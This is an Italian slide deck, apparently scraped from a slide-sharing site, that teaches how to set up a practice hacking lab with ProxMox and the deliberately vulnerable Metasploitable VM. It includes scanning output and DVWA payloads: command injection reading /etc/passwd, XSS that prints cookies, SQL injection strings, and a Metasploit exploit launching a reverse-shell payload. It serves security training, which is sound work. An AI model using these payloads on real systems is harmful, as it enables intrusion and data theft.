3 Pitfalls Everyone Should Avoid with Cloud Data3 Pitfalls Everyone Should Avoid with Cloud Data
3 Pitfalls Everyone Should Avoid with Cloud DataEric D. Schabell
 
How to become a GDSC Lead GDSC MI AOE.pptx
How to become a GDSC Lead GDSC MI AOE.pptxHow to become a GDSC Lead GDSC MI AOE.pptx
How to become a GDSC Lead GDSC MI AOE.pptxKaustubhBhavsar6
 
Trailblazer Community - Flows Workshop (Session 2)
Trailblazer Community - Flows Workshop (Session 2)Trailblazer Community - Flows Workshop (Session 2)
Trailblazer Community - Flows Workshop (Session 2)Muhammad Tiham Siddiqui
 
Oracle Database 23c Security New Features.pptx
Oracle Database 23c Security New Features.pptxOracle Database 23c Security New Features.pptx
Oracle Database 23c Security New Features.pptxSatishbabu Gunukula
 
Stobox 4: Revolutionizing Investment in Real-World Assets Through Tokenization
Stobox 4: Revolutionizing Investment in Real-World Assets Through TokenizationStobox 4: Revolutionizing Investment in Real-World Assets Through Tokenization
Stobox 4: Revolutionizing Investment in Real-World Assets Through TokenizationStobox
 
Keep Your Finger on the Pulse of Your Building's Performance with IES Live
Keep Your Finger on the Pulse of Your Building's Performance with IES LiveKeep Your Finger on the Pulse of Your Building's Performance with IES Live
Keep Your Finger on the Pulse of Your Building's Performance with IES LiveIES VE
 
Scenario Library et REX Discover industry- and role- based scenarios
Scenario Library et REX Discover industry- and role- based scenariosScenario Library et REX Discover industry- and role- based scenarios
Scenario Library et REX Discover industry- and role- based scenariosErol GIRAUDY
 
Planetek Italia Srl - Corporate Profile Brochure
Planetek Italia Srl - Corporate Profile BrochurePlanetek Italia Srl - Corporate Profile Brochure
Planetek Italia Srl - Corporate Profile BrochurePlanetek Italia Srl
 
UiPath Studio Web workshop series - Day 2
UiPath Studio Web workshop series - Day 2UiPath Studio Web workshop series - Day 2
UiPath Studio Web workshop series - Day 2DianaGray10
 
Graphene Quantum Dots-Based Composites for Biomedical Applications
Graphene Quantum Dots-Based Composites for  Biomedical ApplicationsGraphene Quantum Dots-Based Composites for  Biomedical Applications
Graphene Quantum Dots-Based Composites for Biomedical Applicationsnooralam814309
 

Recently uploaded (20)

Flow Control | Block Size | ST Min | First Frame
Flow Control | Block Size | ST Min | First FrameFlow Control | Block Size | ST Min | First Frame
Flow Control | Block Size | ST Min | First Frame
 
Automation Ops Series: Session 2 - Governance for UiPath projects
Automation Ops Series: Session 2 - Governance for UiPath projectsAutomation Ops Series: Session 2 - Governance for UiPath projects
Automation Ops Series: Session 2 - Governance for UiPath projects
 
EMEA What is ThousandEyes? Webinar
EMEA What is ThousandEyes? WebinarEMEA What is ThousandEyes? Webinar
EMEA What is ThousandEyes? Webinar
 
SIM INFORMATION SYSTEM: REVOLUTIONIZING DATA MANAGEMENT
SIM INFORMATION SYSTEM: REVOLUTIONIZING DATA MANAGEMENTSIM INFORMATION SYSTEM: REVOLUTIONIZING DATA MANAGEMENT
SIM INFORMATION SYSTEM: REVOLUTIONIZING DATA MANAGEMENT
 
TrustArc Webinar - How to Live in a Post Third-Party Cookie World
TrustArc Webinar - How to Live in a Post Third-Party Cookie WorldTrustArc Webinar - How to Live in a Post Third-Party Cookie World
TrustArc Webinar - How to Live in a Post Third-Party Cookie World
 
Explore the UiPath Community and ways you can benefit on your journey to auto...
Explore the UiPath Community and ways you can benefit on your journey to auto...Explore the UiPath Community and ways you can benefit on your journey to auto...
Explore the UiPath Community and ways you can benefit on your journey to auto...
 
UiPath Studio Web workshop Series - Day 3
UiPath Studio Web workshop Series - Day 3UiPath Studio Web workshop Series - Day 3
UiPath Studio Web workshop Series - Day 3
 
Q4 2023 Quarterly Investor Presentation - FINAL - v1.pdf
Q4 2023 Quarterly Investor Presentation - FINAL - v1.pdfQ4 2023 Quarterly Investor Presentation - FINAL - v1.pdf
Q4 2023 Quarterly Investor Presentation - FINAL - v1.pdf
 
Patch notes explaining DISARM Version 1.4 update
Patch notes explaining DISARM Version 1.4 updatePatch notes explaining DISARM Version 1.4 update
Patch notes explaining DISARM Version 1.4 update
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
3 Pitfalls Everyone Should Avoid with Cloud Data
3 Pitfalls Everyone Should Avoid with Cloud Data3 Pitfalls Everyone Should Avoid with Cloud Data
3 Pitfalls Everyone Should Avoid with Cloud Data
 
How to become a GDSC Lead GDSC MI AOE.pptx
How to become a GDSC Lead GDSC MI AOE.pptxHow to become a GDSC Lead GDSC MI AOE.pptx
How to become a GDSC Lead GDSC MI AOE.pptx
 
Trailblazer Community - Flows Workshop (Session 2)
Trailblazer Community - Flows Workshop (Session 2)Trailblazer Community - Flows Workshop (Session 2)
Trailblazer Community - Flows Workshop (Session 2)
 
Oracle Database 23c Security New Features.pptx
Oracle Database 23c Security New Features.pptxOracle Database 23c Security New Features.pptx
Oracle Database 23c Security New Features.pptx
 
Stobox 4: Revolutionizing Investment in Real-World Assets Through Tokenization
Stobox 4: Revolutionizing Investment in Real-World Assets Through TokenizationStobox 4: Revolutionizing Investment in Real-World Assets Through Tokenization
Stobox 4: Revolutionizing Investment in Real-World Assets Through Tokenization
 
Keep Your Finger on the Pulse of Your Building's Performance with IES Live
Keep Your Finger on the Pulse of Your Building's Performance with IES LiveKeep Your Finger on the Pulse of Your Building's Performance with IES Live
Keep Your Finger on the Pulse of Your Building's Performance with IES Live
 
Scenario Library et REX Discover industry- and role- based scenarios
Scenario Library et REX Discover industry- and role- based scenariosScenario Library et REX Discover industry- and role- based scenarios
Scenario Library et REX Discover industry- and role- based scenarios
 
Planetek Italia Srl - Corporate Profile Brochure
Planetek Italia Srl - Corporate Profile BrochurePlanetek Italia Srl - Corporate Profile Brochure
Planetek Italia Srl - Corporate Profile Brochure
 
UiPath Studio Web workshop series - Day 2
UiPath Studio Web workshop series - Day 2UiPath Studio Web workshop series - Day 2
UiPath Studio Web workshop series - Day 2
 
Graphene Quantum Dots-Based Composites for Biomedical Applications
Graphene Quantum Dots-Based Composites for  Biomedical ApplicationsGraphene Quantum Dots-Based Composites for  Biomedical Applications
Graphene Quantum Dots-Based Composites for Biomedical Applications
 

Hacking Lab con ProxMox e Metasploitable

  • 1. Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna HACKING LAB con ProxMox e Metasploitable
  • 2. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna $ whoami Phishing Analysis and Contrast @ D3Lab Team Member @ BackBox Linux
  • 3. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Hacking Lab Un laboratorio nella propria infrastruttura di rete per allenarsi in assoluta legalità sulle tecniche sfruttate nel Hacking.
  • 4. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna ProxMox Proxmox VE is a complete open source server virtualization management software. It is based on KVM virtualization and container-based virtualization and manages KVM virtual machines, Linux containers (LXC), storage, virtualized networks, and HA clusters www.proxmox.com
  • 5. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Metasploitable Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. https://sourceforge.net/projects/metasploitable/
  • 6. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. BackBox desktop environment includes a complete set of tools required for ethical hacking and security testing. BackBox Linux backbox.org
  • 7. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable Creiamo una nuova Macchina Virtuale dal Pannello Web Ricordatevelo
  • 8. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 9. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 10. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 11. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 12. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 13. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 14. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable $ ssh root@IP_PROXMOX # cd /var/lib/vz/images
 # mkdir 102 (ID del VM che abbiamo prima creato) # cd 102
 # wget http://bit.ly/metasploitable -O metasploitable.zip
 # unzip metasploitable.zip # cd Metasploitable2-Linux/ # mv Metasploitable.vmdk ../ # rm metasploitable.zip ./Metasploitable2-Linux/ -rf
  • 15. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable # qemu-img convert -f vmdk Metasploitable.vmdk -O qcow2 …Metasploitable.qcow2 # nano /etc/pve/qemu-server/102.conf
  • 16. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable bootdisk: ide0 ide0: file=local:102/Metasploitable.qcow2,size=8G
  • 17. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable Avviamo la VM
  • 18. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable https://youtu.be/WBsCOjRQKnI
  • 19. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: nmap $ nmap 192.168.x.x Starting Nmap 7.01 ( https://nmap.org ) Nmap scan report for 192.168.2.128 Host is up (0.0071s latency). Not shown: 977 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc 8009/tcp open ajp13 8180/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
  • 20. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: nmap $ sudo nmap -o 192.168.x.x Starting Nmap 7.01 ( https://nmap.org ) Nmap scan report for 192.168.2.128 Host is up (0.0071s latency). Not shown: 977 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec … … … Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.24 - 2.6.25 Network Distance: 2 hops Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
  • 21. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Zenmap $ sudo zenmap
  • 22. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Dirsearch $ dirsearch -e php -u http://192.168.x.x [22:30:01] 200 - 112KB - /doc/ [22:30:01] 302 - 0B - /dvwa/ -> login.php [22:30:03] 200 - 891B - /index.php [22:30:05] 200 - 24KB - /mutillidae/ [22:30:05] 200 - 4KB - /phpMyAdmin/ [22:30:06] 200 - 48KB - /phpinfo.php [22:30:07] 403 - 300B - /server-status/ [22:30:08] 200 - 884B - /test/
  • 23. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA http://192.168.x.x/dvwa/ admin:password
  • 24. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA Command Execution Low 192.168.2.1 ; cat /etc/passwd
  • 25. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA Command Execution Medium 192.168.2.1 & cat /etc/passwd
  • 26. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Reflected Low <script>alert('Hello World')</script>
  • 27. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Reflected Medium <ScRiPt>alert('Hello World’)</script> <script language="javascript">alert('Hello World’)</script> <img src=x onerror="alert('Hello World')">
  • 28. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Stored Low <script>document.write(document.cookie)</script> <iframe src=“http://www.makerstation.it/"></iframe> <meta http-equiv="refresh" content="10; url=http:// www.makerstation.it/">
  • 29. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Stored Medium <ScRiPt>alert("Hello World 2")</script>
  • 30. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA SQL Injection Low ' or '0'='0 ' or '0'='0' union select null, version() # ' or '0'='0' union select null, database() #
  • 31. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA SQL Injection Low and SQLMap sqlmap -u "http://192.168.x.x/dvwa/vulnerabilities/sqli/" -- forms --cookie="security=low; PHPSESSID=xyz"
  • 32. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA SQL Injection Medium 0 or 1=1
  • 33. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Whatweb $ whatweb 192.168.x.x [200] Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) DAV/2], IP[192.168.x.x], PHP[5.2.4-2ubuntu5.10], Title[Metasploitable2 - Linux], WebDAV[2], X-Powered- By[PHP/5.2.4-2ubuntu5.10] $ nmap -sV --script=http-php-version 192.168.x.x |_Version from header x-powered-by: PHP/5.2.4-2 |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
  • 34. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Metasploit $ sudo metasploit # search CVE-2012-1823 # use exploit/multi/http/php_cgi_arg_injection # show options # set RHOST 192.168.x.x
 # set PAYLOAD php/meterpreter/reverse_tcp # exploit
  • 35. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Armitage
  • 36. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Q&A @AndreaDraghetti